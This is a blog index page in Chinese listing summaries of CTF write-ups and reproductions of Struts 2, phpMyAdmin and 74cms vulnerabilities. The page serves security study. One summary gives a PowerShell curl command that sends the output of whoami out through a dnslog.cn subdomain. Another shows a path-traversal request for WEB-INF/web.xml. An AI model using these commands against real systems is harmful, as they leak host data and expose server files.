CabbageJun

2022年3月1日

[De1CTF 2019]ShellShellShell

摘要： [De1CTF 2019]ShellShellShell 查看功能将login替换为register，出现注册页面，注册admin，提示用户已存在。注册test用户 md5前5位碰撞 import hashlib for i in range(999999,1000000000): a = has 阅读全文

posted @ 2022-03-01 23:34 CabbageJun 阅读(261) 评论(0) 推荐(0)

S2-007复现分析

摘要：一、漏洞信息漏洞信息页面： S2-007 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞类型： RCE（远程代码执行）受影响组件： Struts 2.0.0 - Struts 2.2.3 漏洞成因：当配置了验证规则，类型转换出错时，阅读全文

posted @ 2022-03-01 15:04 CabbageJun 阅读(189) 评论(0) 推荐(0)

S2-005复现分析

摘要：一、漏洞信息漏洞信息页面： S2-005 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞编号： CVE-2010-1870 漏洞类型： RCE（远程代码执行）受影响组件： Struts 2.0.0 - Struts 2.1.8.1 漏阅读全文

posted @ 2022-03-01 15:01 CabbageJun 阅读(480) 评论(0) 推荐(0)

S2-001复现分析

摘要：一、漏洞信息漏洞信息页面： S2-001 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞类型： RCE（远程代码执行）受影响组件： WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 阅读全文

posted @ 2022-03-01 14:57 CabbageJun 阅读(103) 评论(0) 推荐(0)

2022年2月27日

[网鼎杯 2020 青龙组]filejava

摘要：查看功能打开为上传文件上传一个正常图片点击下载，查看请求访问/DownloadServlet?filename=../../../WEB-INF/web.xml，发现存在任意文件下载 web.xml内容 <?xml version="1.0" encoding="UTF-8"?> <web- 阅读全文

posted @ 2022-02-27 19:07 CabbageJun 阅读(533) 评论(0) 推荐(1)

[强网杯 2019]Upload

摘要：查看功能进入页面，有登陆和注册功能注册账号登陆发现文件上传功能上传普通图片normal.gif，查看页面代码发现文件名被重命名，且后缀被改为png 扫目录发现www.tar.gz，源码泄露，使用tp5框架源码目录结构 route.php <?php // + // | ThinkPHP 阅读全文

posted @ 2022-02-27 19:05 CabbageJun 阅读(295) 评论(0) 推荐(0)

2022年2月14日

DNSlog带外查询

摘要： #Windows powershell curl "$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($(whoami))).Replace('=','AA')).h54w7r.dnslog.cn" #L 阅读全文

posted @ 2022-02-14 20:25 CabbageJun 阅读(269) 评论(0) 推荐(0)

2021年11月27日

phpMyAdmin 4.8.1 文件包含复现（CVE-2018-12613）

摘要： #环境搭建在Windows下使用phpstudy搭建 apache版本：2.4.39 php版本：5.6.9 mysql版本：5.7.26 phpmyadmin 4.8.1下载：https://www.exploit-db.com/exploits/50457 使用composer进行安装 #漏洞阅读全文

posted @ 2021-11-27 15:50 CabbageJun 阅读(208) 评论(0) 推荐(0)

2021年11月26日

74cms v5.0.1后台RCE复现

摘要： #环境搭建在Windows下使用phpstudy搭建 apache版本：2.4.39 php版本：5.4.45 mysql版本：5.7.26 cms下载：http://www.74cms.com/download/index.html #漏洞成因 74cms v5.0.1在url.php中以数组键阅读全文

posted @ 2021-11-26 15:14 CabbageJun 阅读(1147) 评论(0) 推荐(0)

2021年10月25日

md5相同字符串

摘要： URL编码 %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75 阅读全文

posted @ 2021-10-25 23:44 CabbageJun 阅读(662) 评论(0) 推荐(0)

公告